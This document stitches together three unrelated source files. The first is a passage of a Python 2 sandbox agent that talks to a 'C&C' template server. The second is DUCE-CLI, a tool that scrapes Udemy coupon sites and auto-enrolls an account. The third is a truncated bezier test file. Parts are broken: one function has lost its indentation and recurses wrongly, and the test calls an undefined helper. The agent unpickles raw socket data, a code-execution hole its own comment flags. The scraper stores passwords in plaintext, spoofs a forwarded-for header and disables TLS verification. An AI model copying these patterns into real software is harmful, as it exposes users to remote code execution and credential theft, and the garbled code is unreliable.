        NOTE(review): if the tool never writes anything this loop never
        returns.
        """
        if DEBUG: print "Searching files in: {} - tool: {}".format(base_folder, tool_name)
        while True:
            if len(os.listdir(base_folder)) != 0:
                if DEBUG: print "Files found.. Collecting them now..."
                files_found = []
                for root, dirs, files in os.walk(base_folder):
                    for file in files:
                        full_path = os.path.join(root, file)
                        if DEBUG: print "FullPath: {}".format(full_path)
                        file_name = os.path.basename(full_path)
                        if DEBUG: print "FileName: {}".format(file_name)
                        # Locate the tool's own folder in the path; everything
                        # after it is the report-relative path.
                        # NOTE(review): splitting on '\\' makes this Windows-only.
                        index = full_path.split('\\').index(tool_name)
                        if DEBUG: print "Index: {}".format(index)
                        path_found = "/".join([x for x in full_path.split('\\')[index+1:]])
                        if DEBUG: print "PathFound: {}".format(path_found)
                        if path_found.count('/') == 0:
                            # Tool log file was found (e.g. bintext.log)
                            if DEBUG: print "Found log file: {}".format(path_found)
                            if path_found.endswith('.log'):
                                if DEBUG: print "FullPath: {}".format(full_path)
                                file_and_path_found = [full_path, path_found, '/']
                                files_found.append(file_and_path_found)
                        else:
                            # Any file inside of the /files/ folder.
                            if DEBUG: print "Found non-log file: {}".format(path_found)
                            # For non-log files, a file version of the file will be generated
                            # due problems of uploading big files through HTTP. This is a temporary fix.
                            zip_filename = File().zip_file(full_path)
                            # NOTE(review): .split() on the zip name only splits on
                            # whitespace — presumably it always yields one element;
                            # confirm zip_file() never returns names with spaces.
                            file_and_path_found = zip_filename.split() + \
                                path_found.split('/')[:-1]
                            if DEBUG: print file_and_path_found
                            file_and_path_found.insert(
                                0, full_path.replace(file_name, zip_filename))
                            if file_and_path_found not in files_found:
                                if DEBUG: print "Appending file found: {}".format(file_and_path_found)
                                files_found.append(file_and_path_found)
                            if DEBUG: print "FullPathFound: {}".format(file_and_path_found)
                if DEBUG: print "Files Found: {}".format(files_found)
                return list(files_found)
            else:
                if DEBUG: print "Waiting for files to appear..."
                time.sleep(1)
    def report(self, template):
        """Send every collected report file for this run back to the C&C server.

        Builds the shared metadata once, then calls report_back() once per
        file discovered under self.report_path.
        """
        def filter_dir(unfiltered_dir):
            # Normalize the trailing directory components of a files_found
            # entry into a single "/sub/dir" style string.
            if DEBUG: print "Unfiltered dir: {}".format(unfiltered_dir)
            dir_path = "/".join(unfiltered_dir)
            if dir_path.startswith('/'):
                return unfiltered_dir[0]
            return "/{}".format(dir_path)
        report_data = {}
        if os.path.isdir(self.report_path):
            if DEBUG: print "Sending back results to C&C server..."
            # Request variables. Generate data on the server.
            report_data['project_name'] = template.project_name
            report_data['md5'] = template.md5
            report_data['sid'] = template.sid
            report_data['rid'] = template.rid
            report_data['tool_name'] = template.tool_name
            # One upload per collected file; per-file fields are overwritten
            # on each iteration.
            for file_found in self.report_files(self.report_path,
                                                template.tool_name):
                # if DEBUG: print "FileFound: {}".format(file_found)
                report_data['file_abs_path'] = file_found[0]
                report_data['file'] = urllib.quote(file_found[1], safe='')
                report_data['dir'] = filter_dir(file_found[2:])
                if DEBUG: print report_data
                self.report_back(report_data)
            if DEBUG: print "Done."
        else:
            if DEBUG: print "Report Directory ({}) does not exist".format(self.report_path)
def report_directory_check(self, vm_report_name):
report_path = os.path.join(APP_DATA, vm_report_name)
if DEBUG:
print report_path
if not os.path.isdir(report_path):
os.mkdir(report_path)
self.report_directory_check()
else:
REPORT_PATH = report_path
class Agent:
    """TCP client that connects back to the BPH template server, receives
    pickled template payloads and hands each one to TemplateManager."""

    RETRY_SECS = 1       # delay between reconnection attempts
    BUFFER_SIZE = 16384  # max bytes read per recv() call

    def __init__(self):
        self.connection_status = False

    #### Agent Control Functions ####
    def start(self):
        print "Starting Agent..."
        # Connect to Server
        self.connect()

    def stop(self):
        print "Stopping Agent..."
        self.disconnect()
        self.connection_status = False

    def restart(self):
        self.stop()
        self.start()

    #### Agent Connection Functions ####
    def check_connection(self):
        # NOTE(review): stubbed out; the __main__ watchdog relies solely on
        # connection_status.
        pass
        # print dir(self._clientsocket)

    def is_connected(self):
        if self.connection_status == True:
            return True
        return False

    def send(self, data):
        print "Sending Data: {}".format(data)
        try:
            self._clientsocket.send(data)
        except:
            self.reconnect()

    def listen(self):
        """Receive/execute loop: unpickle each payload, run it, ack with 'ok'."""
        print "Connected to C&C Template Server. Waiting for instructions..."
        try:
            while True:
                # Keeps running receiving data. Once received
                # it its automatically un-serialized and converted
                # into an Python dictionary object.
                # SECURITY(review): pickle.loads on raw socket data allows
                # arbitrary code execution by anyone who can reach this
                # port; acceptable only on a fully trusted network.
                serialized_data = pickle.loads(self._clientsocket.recv(self.BUFFER_SIZE))
                template_data = box.Box(serialized_data)
                # TemplateManager decomposes serialized data
                # and take actions to execute the selected program
                TemplateManager(template_data)
                print "Sending back to C&C => OK status"
                self.send('ok')
        except socket.error as e:
            print "Server disconnection: {}".format(e)
            self.reconnect()
        except EOFError as e:
            print "Server disconnection...".format(e)
            self.reconnect()
        else:
            # NOTE(review): unreachable — the while True above only exits via
            # an exception, so this else clause can never run.
            # If template data was received correctly, then acknowledge.
            self.send('skip')

    def connect(self):
        # Make the connection to the server
        print "Connecting to C&C Template Server: {}:{}".format(BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT)
        try:
            # Initialize Socket & connect back to server.
            self._clientsocket = socket.socket()
            self._clientsocket.connect((BPH_TEMPLATE_SERVER_IP, BPH_TEMPLATE_SERVER_PORT))
            self._clientsocket.setblocking(1)
        except socket.error:
            self.reconnect()
        except KeyboardInterrupt:
            print "Interrupting execution."
            sys.exit()
        else:
            print "Connection established. "
            self.connection_status = True
            self.listen()

    def disconnect(self):
        self._clientsocket.close()

    def reconnect(self):
        # NOTE(review): connect() and reconnect() call each other, so a
        # long outage recurses deeper on every retry.
        print "Reconnecting...."
        if DEBUG: print "Connection Error. Server down? Attempting connection in: ({}) seconds".format(self.RETRY_SECS)
        time.sleep(self.RETRY_SECS)
        if DEBUG: print "Attempting now..."
        self.connect()
if __name__ == "__main__":
    # Entry point: start the agent and keep it alive until Ctrl-C.
    agent = Agent()
    try:
        agent.start()
        # Watchdog loop: restart the agent whenever it reports itself
        # disconnected. NOTE(review): busy-spins with no sleep.
        while True:
            # agent.check_connection()
            if not agent.is_connected():
                # If agent stops. Start it again.
                agent.start()
    except KeyboardInterrupt:
        print "Manual interruption. Bye!"
        sys.exit()
|
duce.py
|
import json
import os
import random
import re
import threading
import time
import traceback
from decimal import Decimal
from urllib.parse import parse_qs, unquote, urlsplit
import cloudscraper
import requests
from bs4 import BeautifulSoup as bs
from tqdm import tqdm
from colors import *
# DUCE-CLI
# Scraper
def discudemy():
    """Scrape discudemy.com's listing pages into the module-level du_links list.

    Each entry is formatted "title|:|coupon_url".
    """
    global du_links
    du_links = []
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36 Edg/89.0.774.77",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    }
    # Gather the course cards from the first three listing pages.
    cards = []
    for page_no in range(1, 4):
        resp = requests.get("https://www.discudemy.com/all/" + str(page_no), headers=headers)
        listing = bs(resp.content, "html5lib")
        cards.extend(listing.find_all("a", {"class": "card-header"}))
    progress = tqdm(total=len(cards), desc="Discudemy")
    for card in cards:
        progress.update(1)
        course_title = card.string
        slug = card["href"].split("/")[4]
        resp = requests.get("https://www.discudemy.com/go/" + slug, headers=headers)
        coupon_page = bs(resp.content, "html5lib")
        du_links.append(course_title + "|:|" + coupon_page.find("a", id="couponLink").string)
    progress.close()
def udemy_freebies():
    """Scrape udemyfreebies.com into the module-level uf_links list.

    Each entry is formatted "title|:|udemy_url" (resolved via the site's
    /out/ redirector).
    """
    global uf_links
    uf_links = []
    cards = []
    for page_no in range(1, 3):
        resp = requests.get(
            "https://www.udemyfreebies.com/free-udemy-courses/" + str(page_no)
        )
        listing = bs(resp.content, "html5lib")
        cards.extend(listing.find_all("a", {"class": "theme-img"}))
    progress = tqdm(total=len(cards), desc="Udemy Freebies")
    for card in cards:
        progress.update(1)
        course_title = card.img["alt"]
        # Follow the redirector and keep the final URL it lands on.
        final_url = requests.get(
            "https://www.udemyfreebies.com/out/" + card["href"].split("/")[4]
        ).url
        uf_links.append(course_title + "|:|" + final_url)
    progress.close()
def tutorialbar():
    """Scrape tutorialbar.com into the module-level tb_links list.

    Only offers whose outbound button actually points at www.udemy.com are
    kept; each entry is "title|:|udemy_url".
    """
    global tb_links
    tb_links = []
    headings = []
    for page_no in range(1, 4):
        resp = requests.get("https://www.tutorialbar.com/all-courses/page/" + str(page_no))
        listing = bs(resp.content, "html5lib")
        headings.extend(
            listing.find_all(
                "h3", class_="mb15 mt0 font110 mobfont100 fontnormal lineheight20"
            )
        )
    progress = tqdm(total=len(headings), desc="Tutorial Bar")
    for heading in headings:
        progress.update(1)
        course_title = heading.a.string
        detail = bs(requests.get(heading.a["href"]).content, "html5lib")
        offer_url = detail.find("a", class_="btn_offer_block re_track_btn")["href"]
        if "www.udemy.com" in offer_url:
            tb_links.append(course_title + "|:|" + offer_url)
    progress.close()
def real_discount():
    """Scrape real.discount's Udemy store into the module-level rd_links list.

    linksynergy tracking links are unwrapped to the real target via their
    RD_PARM1 query parameter; each entry is "title|:|udemy_url".
    """
    global rd_links
    rd_links = []
    cards = []
    for page_no in range(1, 3):
        resp = requests.get("https://real.discount/stores/Udemy?page=" + str(page_no))
        listing = bs(resp.content, "html5lib")
        cards.extend(listing.find_all("div", class_="col-xl-4 col-md-6"))
    progress = tqdm(total=len(cards), desc="Real Discount")
    for card in cards:
        progress.update(1)
        course_title = card.a.h3.string
        detail_url = "https://real.discount" + card.a["href"]
        detail = bs(requests.get(detail_url).content, "html5lib")
        offer_url = detail.find(
            "div", class_="col-xs-12 col-md-12 col-sm-12 text-center"
        ).a["href"]
        if offer_url.startswith("http://click.linksynergy.com"):
            offer_url = parse_qs(offer_url)["RD_PARM1"][0]
        rd_links.append(course_title + "|:|" + offer_url)
    progress.close()
def coursevania():
    """Scrape coursevania.com's AJAX course grid into the module-level
    cv_links list; each entry is "title|:|buy_url"."""
    global cv_links
    cv_links = []
    r = requests.get("https://coursevania.com/courses/")
    soup = bs(r.content, "html5lib")
    # The WP admin-ajax endpoint requires a nonce that is embedded in an
    # inline <script>; pull the JSON blob out of the script mentioning
    # "load_content".
    # NOTE(review): str.strip("_mlv = norsecat;\n") strips a *character set*,
    # not that literal prefix/suffix — it happens to work for this page but
    # is fragile.
    nonce = json.loads(
        [
            script.string
            for script in soup.find_all("script")
            if script.string and "load_content" in script.string
        ][0].strip("_mlv = norsecat;\n")
    )["load_content"]
    # Ask the AJAX endpoint for the newest 30 courses as rendered HTML.
    r = requests.get(
        "https://coursevania.com/wp-admin/admin-ajax.php?&template=courses/grid&args={%22posts_per_page%22:%2230%22}&action=stm_lms_load_content&nonce="
        + nonce
        + "&sort=date_high"
    ).json()
    soup = bs(r["content"], "html5lib")
    small_all = soup.find_all("div", {"class": "stm_lms_courses__single--title"})
    cv_bar = tqdm(total=len(small_all), desc="Course Vania")
    for index, item in enumerate(small_all):
        cv_bar.update(1)
        title = item.h5.string
        # Visit each course page to fetch its buy/redirect link.
        r = requests.get(item.a["href"])
        soup = bs(r.content, "html5lib")
        cv_links.append(
            title + "|:|" + soup.find("div", {"class": "stm-lms-buy-buttons"}).a["href"]
        )
    cv_bar.close()
def idcoupons():
    """Scrape idownloadcoupon.com into the module-level idc_links list.

    Affiliate wrappers (admitad / linksynergy) are unwrapped to the real
    target URL; each entry is "title|:|udemy_url".
    """
    global idc_links
    idc_links = []
    buttons = []
    for page_no in range(1, 6):
        resp = requests.get(
            "https://idownloadcoupon.com/product-category/udemy-2/page/" + str(page_no)
        )
        listing = bs(resp.content, "html5lib")
        buttons.extend(
            listing.find_all("a", attrs={"class": "button product_type_external"})
        )
    progress = tqdm(total=len(buttons), desc="IDownloadCoupons")
    for button in buttons:
        progress.update(1)
        course_title = button["aria-label"]
        target = unquote(button["href"])
        if target.startswith("https://ad.admitad.com"):
            target = parse_qs(target)["ulp"][0]
        elif target.startswith("https://click.linksynergy.com"):
            target = parse_qs(target)["murl"][0]
        idc_links.append(course_title + "|:|" + target)
    progress.close()
def enext() -> list:
    """Scrape e-next.in's Udemy coupon page; entries are "title|:|link".

    BUG FIX: the result list is now published through the module-level
    ``en_links`` global (matching every other scraper) AND returned as the
    ``-> list`` annotation promises. Previously ``en_links`` was only a
    local and nothing was returned, so main1()'s lookup of "en_links"
    always failed silently and E-next results were discarded.
    """
    global en_links
    en_links = []
    r = requests.get("https://e-next.in/e/udemycoupons.php")
    soup = bs(r.content, "html5lib")
    big_all = soup.find("div", {"class": "scroll-box"}).find_all("p", {"class": "p2"})
    en_bar = tqdm(total=len(big_all), desc="E-next")
    for i in big_all:
        en_bar.update(1)
        # Drop the "Coupon No-" style prefix and the trailing CTA text.
        title = i.text[11:].strip().removesuffix("Enroll Now free").strip()
        link = i.a["href"]
        en_links.append(title + "|:|" + link)
    en_bar.close()
    return en_links
# Constants
version = "v1.6"  # release tag; compared against the GitHub latest tag in update_available()
def create_scrape_obj():
    """Build a fresh mapping of site name -> daemon Thread for every scraper.

    Threads are created unstarted; main1() starts and joins them.
    """
    scrapers = {
        "Discudemy": discudemy,
        "Udemy Freebies": udemy_freebies,
        "Tutorial Bar": tutorialbar,
        "Real Discount": real_discount,
        "Course Vania": coursevania,
        "IDownloadCoupons": idcoupons,
        "E-next": enext,
    }
    return {
        name: threading.Thread(target=func, daemon=True)
        for name, func in scrapers.items()
    }
################
def cookiejar(client_id, access_token, csrf_token):
    """Bundle the three Udemy auth cookies into a plain dict usable by requests."""
    return {
        "client_id": client_id,
        "access_token": access_token,
        "csrf_token": csrf_token,
    }
def load_settings():
    """Load duce-cli-settings.json (downloading the default from GitHub when
    the local file is absent) and return
    (settings, instructor_exclude, title_exclude) where the exclude values
    are newline-joined strings.
    """
    try:
        with open("duce-cli-settings.json") as f:
            settings = json.load(f)
    except FileNotFoundError:
        settings = requests.get(
            "https://raw.githubusercontent.com/techtanic/Discounted-Udemy-Course-Enroller/master/duce-cli-settings.json"
        ).json()
    title_exclude = "\n".join(settings["title_exclude"])
    instructor_exclude = "\n".join(settings["instructor_exclude"])
    # Backfill keys introduced by newer releases so old settings files
    # keep working.
    settings["languages"].setdefault("Russian", True)
    settings.setdefault("save_txt", True)  # v1.3
    settings["sites"].setdefault("E-next", True)  # v1.4
    settings.setdefault("discounted_only", False)  # v1.4
    return settings, instructor_exclude, title_exclude
def save_settings():
    # Persist the module-level ``settings`` dict next to the script so the
    # next run's load_settings() can skip the GitHub download.
    with open("duce-cli-settings.json", "w") as f:
        json.dump(settings, f, indent=4)
def get_course_id(url):
    """Resolve a course landing URL to Udemy's course id.

    Returns the id (string) or False when the link is dead (404 or a
    redirect, which usually means the coupon page is gone) or points at a
    draft course.
    """
    r = requests.get(url, allow_redirects=False)
    if r.status_code in (404, 302, 301):
        return False
    if "/course/draft/" in url:
        return False
    soup = bs(r.content, "html5lib")
    try:
        courseid = soup.find(
            "div",
            attrs={"data-content-group": "Landing Page"},
        )["data-course-id"]
    except (TypeError, KeyError):
        # find() returned None (TypeError) or the attribute is absent
        # (KeyError): fall back to the udlite landing-page marker.
        # BUG FIX: the former bare ``except`` could also mask unrelated
        # programming errors.
        courseid = soup.find(
            "body", attrs={"data-module-id": "course-landing-page/udlite"}
        )["data-clp-course-id"]
    # with open("problem.txt","w",encoding="utf-8") as f:
    #     f.write(str(soup))
    return courseid
def get_course_coupon(url):
    """Extract the couponCode query parameter from a course URL.

    Returns "" when the URL carries no coupon. BUG FIX: replaces a bare
    ``except`` (which also swallowed unrelated errors) with an explicit
    ``dict.get`` lookup.
    """
    params = parse_qs(urlsplit(url).query)
    coupon = params.get("couponCode")
    return coupon[0] if coupon else ""
def affiliate_api(courseid):
    """Return (category, language, rounded recent rating, instructor slug)
    for a course, via the module-level authenticated session ``s``."""
    info = s.get(
        "https://www.udemy.com/api-2.0/courses/"
        + courseid
        + "/?fields[course]=locale,primary_category,avg_rating_recent,visible_instructors",
    ).json()
    # The instructor URL looks like /user/<slug>/ — keep just the slug.
    instructor_slug = (
        info["visible_instructors"][0]["url"].removeprefix("/user/").removesuffix("/")
    )
    category = info["primary_category"]["title"]
    language = info["locale"]["simple_english_title"]
    rating = round(info["avg_rating_recent"], 1)
    return category, language, rating, instructor_slug
def course_landing_api(courseid):
    """Return (purchase_date_or_False, list_price_as_Decimal) for a course.

    BUG FIX: when the price lookup failed, the original printed the
    payload and then crashed with UnboundLocalError because ``amount`` was
    never assigned; it now falls back to a price of 0.
    """
    r = s.get(
        "https://www.udemy.com/api-2.0/course-landing-components/"
        + courseid
        + "/me/?components=purchase"
    ).json()
    try:
        purchased = r["purchase"]["data"]["purchase_date"]
    except (KeyError, TypeError):
        # No purchase record — course not yet owned.
        purchased = False
    try:
        amount = r["purchase"]["data"]["list_price"]["amount"]
    except (KeyError, TypeError):
        # Keep the diagnostic print, but recover instead of crashing.
        print(r["purchase"]["data"])
        amount = 0
    return purchased, Decimal(amount)
def remove_duplicates(l):
    """Drop duplicates while keeping each item's first occurrence in order.

    BUG/PERF FIX: the old implementation reversed the list and called
    ``list.remove`` while iterating the list it was mutating — O(n^2) and
    fragile. ``dict.fromkeys`` yields the same first-occurrence ordering
    in O(n). Items must be hashable (here they are "title|:|link" strings).
    """
    return list(dict.fromkeys(l))
def update_available():
    """Print a banner when a newer release exists on GitHub.

    BUG FIX: versions were previously compared as raw strings, which
    mis-orders multi-digit components (e.g. "1.10" < "1.9" as strings);
    compare tuples of numeric components instead.
    """
    latest = requests.get(
        "https://api.github.com/repos/techtanic/Discounted-Udemy-Course-Enroller/releases/latest"
    ).json()["tag_name"].removeprefix("v")
    current = version.removeprefix("v")

    def numeric_tuple(v):
        # Non-numeric components fall back to 0 so a malformed tag can't raise.
        return tuple(int(p) if p.isdigit() else 0 for p in v.split("."))

    if numeric_tuple(current) < numeric_tuple(latest):
        print(by + fr + " Update Available ")
def check_login(email, password):
    """Log into Udemy through the signup-popup flow.

    Returns a 5-tuple (headers, display_name, currency, session, error):
    on success ``error`` is "" and ``session`` is an authenticated
    requests.Session; on failure the first four slots are empty strings
    and ``error`` describes the problem. Retries twice around Cloudflare
    challenges.
    """
    for retry in range(0, 2):
        # Fresh scraper per attempt; fetch the login page for its CSRF token.
        s = cloudscraper.CloudScraper()
        r = s.get(
            "https://www.udemy.com/join/signup-popup/",
        )
        soup = bs(r.text, "html5lib")
        csrf_token = soup.find("input", {"name": "csrfmiddlewaretoken"})["value"]
        data = {
            "csrfmiddlewaretoken": csrf_token,
            "locale": "en_US",
            "email": email,
            "password": password,
        }
        s.headers.update({"Referer": "https://www.udemy.com/join/signup-popup/"})
        try:
            r = s.post(
                "https://www.udemy.com/join/login-popup/?locale=en_US",
                data=data,
                allow_redirects=False,
            )
        except cloudscraper.exceptions.CloudflareChallengeError:
            continue
        if r.status_code == 302:
            # 302 means the credentials were accepted; harvest the cookies.
            cookies = cookiejar(
                r.cookies["client_id"], r.cookies["access_token"], csrf_token
            )
            head = {
                "authorization": "Bearer " + r.cookies["access_token"],
                "accept": "application/json, text/plain, */*",
                "x-requested-with": "XMLHttpRequest",
                # Randomized forwarded-for address for each login session.
                "x-forwarded-for": str(
                    ".".join(map(str, (random.randint(0, 255) for _ in range(4))))
                ),
                "x-udemy-authorization": "Bearer " + r.cookies["access_token"],
                "content-type": "application/json;charset=UTF-8",
                "origin": "https://www.udemy.com",
                "referer": "https://www.udemy.com/",
                "dnt": "1",
            }
            # Switch to a plain requests session carrying the auth state.
            s = requests.session()
            s.cookies.update(cookies)
            s.headers.update(head)
            s.keep_alive = False
            r = s.get(
                "https://www.udemy.com/api-2.0/contexts/me/?me=True&Config=True"
            ).json()
            currency = r["Config"]["price_country"]["currency"]
            user = r["me"]["display_name"]
            # Remember working credentials for the next run.
            settings["email"], settings["password"] = email, password
            save_settings()
            return head, user, currency, s, ""
        else:
            # Non-302: scrape the error banner and classify it by first letter
            # ("Y..." = rate limited, "T..." = bad credentials).
            soup = bs(r.content, "html5lib")
            txt = soup.find(
                "div", class_="alert alert-danger js-error-alert"
            ).text.strip()
            if txt[0] == "Y":
                return "", "", "", "", "Too many logins per hour try later"
            elif txt[0] == "T":
                return "", "", "", "", "Email or password incorrect"
            else:
                return "", "", "", "", txt
    # Both attempts hit the Cloudflare challenge.
    return (
        "",
        "",
        "",
        "",
        "Cloudflare is blocking your requests try again after an hour",
    )
def title_in_exclusion(title, t_x):
    """Return True when any whitespace-separated word of ``title`` is in ``t_x``.

    Matching is case-insensitive on the title side; ``t_x`` entries are
    assumed lower-case already.
    """
    return any(word in t_x for word in title.casefold().split())
# -----------------
def free_checkout(coupon, courseid):
    """Submit a zero-amount coupon checkout for ``courseid`` and return the
    JSON response.

    BUG FIX: the payload was previously assembled by string concatenation,
    producing invalid JSON whenever the coupon code contained a quote or
    backslash; build a dict and serialize it with json.dumps instead.
    """
    payload = json.dumps({
        "checkout_environment": "Marketplace",
        "checkout_event": "Submit",
        "shopping_info": {
            "items": [
                {
                    "discountInfo": {"code": coupon},
                    # courseid arrives as a numeric string; send it as a
                    # JSON number like the original payload did.
                    "buyable": {"type": "course", "id": int(courseid), "context": {}},
                    "price": {"amount": 0, "currency": currency},
                }
            ]
        },
        "payment_info": {
            "payment_vendor": "Free",
            "payment_method": "free-method",
        },
    })
    r = s.post(
        "https://www.udemy.com/payment/checkout-submit/",
        data=payload,
        verify=False,
    )
    return r.json()
def free_enroll(courseid):
    """Subscribe to a free (couponless) course and return the API's record of it."""
    cid = str(courseid)
    # First request performs the subscription; second fetches the course record.
    s.get("https://www.udemy.com/course/subscribe/?courseId=" + cid)
    details = s.get(
        "https://www.udemy.com/api-2.0/users/me/subscribed-courses/"
        + cid
        + "/?fields%5Bcourse%5D=%40default%2Cbuyable_object_type%2Cprimary_subcategory%2Cis_private"
    )
    return details.json()
# -----------------
def auto(list_st):
    """Walk every scraped "title|:|link" combo and enroll where possible.

    Applies the user's filter globals (instructor_exclude, title_exclude,
    categories, languages, min_rating), prints a status line per course,
    and finishes with a summary of enrolled/excluded/expired counts.
    """
    se_c, ae_c, e_c, ex_c, as_c = 0, 0, 0, 0, 0
    if settings["save_txt"]:
        if not os.path.exists("Courses/"):
            os.makedirs("Courses/")
        txt_file = open(f"Courses/" + time.strftime("%Y-%m-%d--%H-%M"), "w")
    for index, combo in enumerate(list_st):
        tl = combo.split("|:|")
        print(fy + str(index) + " " + tl[0], end=" ")
        link = tl[1]
        print(fb + link)
        course_id = get_course_id(link)
        if course_id:
            coupon_id = get_course_coupon(link)
            cat, lang, avg_rating, instructor = affiliate_api(course_id)
            purchased, amount = course_landing_api(course_id)
            if (
                instructor in instructor_exclude
                or title_in_exclusion(tl[0], title_exclude)
                or cat not in categories
                or lang not in languages
                or avg_rating < min_rating
            ):
                # Report the first matching exclusion reason.
                if instructor in instructor_exclude:
                    # BUG FIX: this branch previously incremented ex_c here
                    # AND below, double-counting instructor exclusions.
                    print(flb + f"Instructor excluded: {instructor}")
                elif title_in_exclusion(tl[0], title_exclude):
                    # BUG FIX: this branch previously printed the
                    # instructor-exclusion message instead of the title one.
                    print(flb + f"Title excluded: {tl[0]}")
                elif cat not in categories:
                    print(flb + f"Category excluded: {cat}")
                elif lang not in languages:
                    print(flb + f"Languages excluded: {lang}")
                elif avg_rating < min_rating:
                    print(flb + f"Poor rating: {avg_rating}")
                print()
                ex_c += 1
            else:
                if not purchased:
                    if coupon_id:
                        slp = ""
                        js = free_checkout(coupon_id, course_id)
                        try:
                            if js["status"] == "succeeded":
                                print(fg + "Successfully Enrolled\n")
                                se_c += 1
                                as_c += amount
                                if settings["save_txt"]:
                                    txt_file.write(combo + "\n")
                                    txt_file.flush()
                                    os.fsync(txt_file.fileno())
                            elif js["status"] == "failed":
                                # print(js)
                                print(fr + "Coupon Expired\n")
                                e_c += 1
                        except:
                            try:
                                # Udemy's rate-limit message embeds the
                                # number of seconds to wait.
                                msg = js["detail"]
                                print(fr + msg)
                                print()
                                slp = int(re.search(r"\d+", msg).group(0))
                            except:
                                # print(js)
                                print(fr + "Expired Coupon\n")
                                e_c += 1
                        if slp != "":
                            slp += 5
                            print(
                                fr
                                + ">>> Pausing execution of script for "
                                + str(slp)
                                + " seconds\n",
                            )
                            time.sleep(slp)
                        else:
                            # Gentle pacing between checkout requests.
                            time.sleep(4)
                    elif not coupon_id:
                        js = free_enroll(course_id)
                        try:
                            if js["_class"] == "course":
                                print(fg + "Successfully Subscribed\n")
                                se_c += 1
                                as_c += amount
                                if settings["save_txt"]:
                                    txt_file.write(combo + "\n")
                                    txt_file.flush()
                                    os.fsync(txt_file.fileno())
                        except:
                            print(fr + "COUPON MIGHT HAVE EXPIRED\n")
                            e_c += 1
                elif purchased:
                    print(flb + purchased)
                    print()
                    ae_c += 1
        elif not course_id:
            print(fr + ".Course Expired.\n")
            e_c += 1
        # main_window["pout"].update(index + 1)
    if settings["save_txt"]:
        # BUG FIX: the courses file was previously never closed.
        txt_file.close()
    print(f"Successfully Enrolled: {se_c}")
    print(f"Already Enrolled: {ae_c}")
    print(f"Amount Saved: ${round(as_c,2)}")
    print(f"Expired Courses: {e_c}")
    print(f"Excluded Courses: {ex_c}")
def random_color():
    """Pick one of the three accent colour names at random."""
    return random.choice(("green", "yellow", "white"))
##########################################
def main1():
    """Run every enabled scraper thread, merge their link lists, and enroll.

    IMPROVEMENT: the per-scraper result lists are now read via
    ``globals().get`` instead of ``eval`` on name strings — same behavior,
    no eval; a scraper that crashed before publishing its global simply
    contributes nothing.
    """
    try:
        links_ls = []
        for scraper_thread in funcs.values():
            scraper_thread.start()
            # Slight stagger so the progress bars don't all spawn at once.
            time.sleep(0.09)
        for scraper_thread in funcs.values():
            scraper_thread.join()
        time.sleep(1)
        for list_name in (
            "du_links",
            "uf_links",
            "tb_links",
            "rd_links",
            "cv_links",
            "idc_links",
            "en_links",
        ):
            links_ls += globals().get(list_name, [])
        auto(remove_duplicates(links_ls))
    except Exception:
        print(traceback.format_exc())
settings, instructor_exclude, title_exclude = load_settings()
############## MAIN ############# MAIN############## MAIN ############# MAIN ############## MAIN ############# MAIN ###########
# Login loop: check_login returns the error string as its 5th element
# ("" on success), so the loop repeats until a login succeeds.
# NOTE(review): when saved credentials are wrong this loops forever,
# since the settings values are re-used on every iteration.
txt = True
while txt:
    if settings["email"] or settings["password"]:
        email, password = settings["email"], settings["password"]
    else:
        email = input("Email: ")
        password = input("Password: ")
    print(fb + "Trying to login")
    head, user, currency, s, txt = check_login(email, password)
    if txt:
        print(fr + txt)
print(fg + f"Logged in as {user}")
# Version check is best-effort; network failures are ignored.
try:
    update_available()
except:
    pass
all_functions = create_scrape_obj()
funcs = {}
sites = []
categories = []
languages = []
# Pull the user's filter preferences out of the settings dict.
instructor_exclude = settings["instructor_exclude"]
title_exclude = settings["title_exclude"]
min_rating = settings["min_rating"]
user_dumb = True  # stays True only if no site is enabled at all
for name in settings["sites"]:
    if settings["sites"][name]:
        funcs[name] = all_functions[name]
        sites.append(name)
        user_dumb = False
for cat in settings["categories"]:
    if settings["categories"][cat]:
        categories.append(cat)
for lang in settings["languages"]:
    if settings["languages"][lang]:
        languages.append(lang)
if user_dumb:
    print(bw + fr + " No sites selected ")
if not user_dumb:
    # Run the whole scrape/enroll pipeline in a daemon thread and wait on it.
    tm = threading.Thread(target=main1, daemon=True)
    tm.start()
    tm.join()
|
test__triangle_intersection.py
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import unittest
from tests import utils as base_utils
from tests.unit import utils
from tests.unit.hazmat import test_triangle_intersection
@utils.needs_speedup
class Test_speedup_newton_refine(
    test_triangle_intersection.Test_newton_refine
):
    """Re-run the pure-Python newton-refine test suite against the compiled
    ``_speedup`` implementation."""

    @staticmethod
    def _call_function_under_test(nodes, degree, x_val, y_val, s, t):
        from bezier import _speedup

        return _speedup.newton_refine_triangle(
            nodes, degree, x_val, y_val, s, t
        )
@utils.needs_speedup
class Test_speedup_locate_point(test_triangle_intersection.Test_locate_point):
    """Re-run the pure-Python locate-point test suite against the compiled
    ``_speedup`` implementation."""

    @staticmethod
    def _call_function_under_test(nodes, degree, x_val, y_val):
        from bezier import _speedup

        return _speedup.locate_point_triangle(nodes, degree, x_val, y_val)
@utils.needs_speedup
class Test_speedup_geometric_intersect(
    test_triangle_intersection.Test_geometric_intersect
):
    """Run the geometric-intersection suite against ``_speedup`` and add
    checks for the module's reusable workspace resizing behavior."""

    # The compiled implementation reports bad boundaries differently from
    # the pure-Python one; override the expected error shape.
    BAD_BOUNDARY_ARGS = ("Unexpected number of edges",)
    BAD_BOUNDARY_TYPE = RuntimeError
    BAD_BOUNDARY_INCREASE_ULPS = True

    @staticmethod
    def _call_function_under_test(nodes1, degree1, nodes2, degree2, **kwargs):
        from bezier import _speedup

        return _speedup.triangle_intersections(
            nodes1, degree1, nodes2, degree2, **kwargs
        )

    def test_two_curved_polygons(self):
        # Make sure there is enough space so that no resize is needed.
        sizes = triangle_workspace_sizes()
        segment_ends_size, segments_size = sizes
        self.assertGreaterEqual(segment_ends_size, 2)
        self.assertGreaterEqual(segments_size, 6)
